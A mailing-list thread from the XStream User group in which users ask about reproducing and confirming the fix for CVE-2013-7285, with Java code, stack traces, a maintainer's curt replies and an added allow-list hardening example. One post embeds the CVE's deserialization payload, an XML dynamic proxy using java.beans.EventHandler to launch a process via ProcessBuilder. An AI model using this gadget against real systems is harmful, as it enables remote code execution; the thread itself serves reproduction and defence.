CVE-2013-7285 - What is the correct way to reproduce?


Dwouglas Mhagnum

Dec 17, 2017, 10:53:48 AM
to XStream User
I followed the steps defined here
http://x-stream.github.io/CVE-2013-7285.html#reproduction
but without success.

XStream versions: 1.3.1 and 1.4.10
Java 8

Tks!

Jörg Schaible

Dec 19, 2017, 1:33:10 PM
to xstrea...@googlegroups.com
Hi,
the article states clearly which versions are affected. So it's no wonder that you cannot reproduce it
with version 1.4.10.

So, what did you do exactly?

Cheers,
Jörg

Luy Bai

Oct 24, 2019, 3:27:02 AM
to XStream User
Hi,

I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

Thanks.

Bazil

Oct 24, 2019, 9:07:33 AM
to xstrea...@googlegroups.com
Hi

I used TreeSet as a class field to implement a set of nested elements, so a vulnerability warning was issued.
I solved this problem simply by registering CollectionConverter.

Thanks

Thu, 24 Oct 2019 at 14:27, Luy Bai <bly8...@gmail.com>:
--
You received this message because you are subscribed to the Google Groups "XStream User" group.
To unsubscribe from this group and stop receiving emails from it, send an email to xstream-user...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/xstream-user/7afa7823-48a0-4e77-a828-61fe4e45405a%40googlegroups.com.

Jörg Schaible

Oct 25, 2019, 1:32:38 PM
to xstrea...@googlegroups.com
On Thu, 24 Oct 2019 00:27:02 -0700 Luy Bai wrote:

> Hi,
>
> I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please
> refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

Which part of this is unclear?
x-stream.github.io/CVE-2013-7285.html#affected_versions

- Jörg

Jörg Schaible

Oct 25, 2019, 1:35:04 PM
to xstrea...@googlegroups.com
On Thu, 24 Oct 2019 20:07:19 +0700 Bazil wrote:

> Hi
>
> I used TreeSet as a class field to implement a set of nested elements,
> so a vulnerability warning was issued.
> I solved this problem simply by registering CollectionConverter

This is completely unrelated and has nothing to do with a CVE.

>
> Thanks
>
> Thu, 24 Oct 2019 at 14:27, Luy Bai
> <bly8...@gmail.com>:
>
>> Hi,
>>
>> I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please
>> refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

[snip]

Luy Bai

Oct 28, 2019, 5:26:19 AM
to XStream User
Hi,

We are using Anchore to scan the Docker image and got a report that the vulnerability was detected. I can understand the statements from x-stream.github.io/CVE-2013-7285.html#affected_versions.
I want to double-check that the 1.4.11.1 version has fixed the vulnerability already.

Can you please confirm this?

Thanks.

Bazil

Oct 28, 2019, 9:59:01 AM
to xstrea...@googlegroups.com
Hi,
I don't quite understand what you want from me.
I did it like this:

import com.thoughtworks.xstream.XStream;
// Contact is the poster's own interface (org.company.model.Contact in the second
// example below) declaring getName() and getLastname().
import org.company.model.Contact;

public class CVE20137285 {

    static class ContactImpl implements Contact {

        @Override
        public String getName() {
            return "Vasya";
        }

        @Override
        public String getLastname() {
            return "Pupkin";
        }
    }

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        // Plain XStream instance: no security framework configured, so the
        // "Security framework of XStream not initialized" warning is printed on unmarshal.
        XStream xstream = new XStream();
        String xml = xstream.toXML(new ContactImpl());
        Contact contact = (Contact) xstream.fromXML(xml);
        System.out.println(contact.getName());
    }
}

and got this:

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by com.thoughtworks.xstream.core.util.Fields (file:/C:/Temp/xstream-1.4.11.1/lib/xstream-1.4.11.1.jar) to field java.util.TreeMap.comparator
WARNING: Please consider reporting this to the maintainers of com.thoughtworks.xstream.core.util.Fields
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Security framework of XStream not initialized, XStream is probably vulnerable.
Vasya

Then I did it like this (same class as above, with main() replaced):

    public static void main(String[] args) {
        XStream xstream = new XStream();
        // Document taken from the CVE reproduction page, reproduced exactly as posted.
        String xml = "<contact>\n" +
                     "  <dynamic-proxy>\n" +
                     "    <interface>org.company.model.Contact</interface>\n" +
                     "    <handler class='java.beans.EventHandler'>\n" +
                     "      <target class='java.lang.ProcessBuilder'>\n" +
                     "        <command>\n" +
                     "          <string>calc.exe</string>\n" +
                     "        </command>\n" +
                     "      </target>\n" +
                     "      <action>start</action>\n" +
                     "    <handler>\n" +
                     "  </dynamic-proxy>\n" +
                     "</contact>";
        // No alias is registered for "contact", so XStream cannot resolve the root element.
        Contact contact = (Contact) xstream.fromXML(xml);
        System.out.println(contact.getName());
    }

and got this:

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by com.thoughtworks.xstream.core.util.Fields (file:/C:/Temp/xstream-1.4.11.1/lib/xstream-1.4.11.1.jar) to field java.util.TreeMap.comparator
WARNING: Please consider reporting this to the maintainers of com.thoughtworks.xstream.core.util.Fields
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Security framework of XStream not initialized, XStream is probably vulnerable.
Exception in thread "main" com.thoughtworks.xstream.mapper.CannotResolveClassException: contact
at com.thoughtworks.xstream.mapper.DefaultMapper.realClass(DefaultMapper.java:81)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.DynamicProxyMapper.realClass(DynamicProxyMapper.java:55)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.PackageAliasingMapper.realClass(PackageAliasingMapper.java:88)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.ClassAliasingMapper.realClass(ClassAliasingMapper.java:79)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.ArrayMapper.realClass(ArrayMapper.java:74)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.SecurityMapper.realClass(SecurityMapper.java:71)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.CachingMapper.realClass(CachingMapper.java:47)
at com.thoughtworks.xstream.core.util.HierarchicalStreams.readClassType(HierarchicalStreams.java:29)
at com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller.java:133)
at com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarshal(AbstractTreeMarshallingStrategy.java:32)
at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1487)
at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1467)
at com.thoughtworks.xstream.XStream.fromXML(XStream.java:1338)
at com.thoughtworks.xstream.XStream.fromXML(XStream.java:1329)
at cve.pkg2013.pkg7285.CVE20137285.main(CVE20137285.java:47)
C:\Users\ingen\AppData\Local\NetBeans\Cache\11.1\executor-snippets\run.xml:111: The following error occurred while executing this line:
C:\Users\ingen\AppData\Local\NetBeans\Cache\11.1\executor-snippets\run.xml:68: Java returned: 1
 
Is this enough, or is it again not what you need?

Mon, 28 Oct 2019 at 16:26, Luy Bai <bly8...@gmail.com>:
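The "Security framework of XStream not initialized" line in the output above is the part a defender should act on. The following is an added example (not Bazil's code and not from the XStream project) showing the allow-list configuration that XStream 1.4.10 and later provide; it assumes a stand-in Contact interface with the same two getters as the thread's org.company.model.Contact, and feeds in a constructed document naming a type outside the allow-list to show it being rejected with ForbiddenClassException.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SecuredContactXStream {

    // Stand-in for the thread's org.company.model.Contact (assumed shape).
    public interface Contact {
        String getName();
        String getLastname();
    }

    public static class ContactImpl implements Contact {
        private String name = "Vasya";
        private String lastname = "Pupkin";
        public String getName() { return name; }
        public String getLastname() { return lastname; }
    }

    /** Builds an XStream instance that unmarshals only the types named here. */
    public static XStream securedXStream() {
        XStream xstream = new XStream();
        // Marks the security framework as initialised (no "probably vulnerable" warning)
        // and installs XStream's own default permissions; in 1.4.18+ this is the default.
        XStream.setupDefaultSecurity(xstream);
        // Replace those defaults with an explicit allow-list: deny everything first,
        // then re-admit null, primitives, String and our model class.
        xstream.addPermission(NoTypePermission.NONE);
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, ContactImpl.class });
        xstream.alias("contact", ContactImpl.class);
        return xstream;
    }

    public static void main(String[] args) {
        XStream xstream = securedXStream();
        // Round trip of our own object still works.
        String xml = xstream.toXML(new ContactImpl());
        Contact contact = (Contact) xstream.fromXML(xml);
        System.out.println(contact.getName());

        // Constructed untrusted document naming a JDK type that is not on the allow-list.
        String untrusted = "<java.util.Date>0</java.util.Date>";
        try {
            xstream.fromXML(untrusted);
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Registering a converter such as CollectionConverter, as mentioned earlier in the thread, changes how a type is serialised but is not a security control; only the permission allow-list decides which classes XStream will instantiate from input.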

Jörg Schaible

Nov 3, 2019, 10:40:04 AM
to xstrea...@googlegroups.com
Hi Bazil,

On Monday, 28 October 2019, 14:58:48 CET, Bazil wrote:

> Hi,
> I don't quite understand what you want from me

[snip]

Then stop writing rubbish. Your examples have absolutely nothing to do with any
reported CVE.

Regards,
Jörg

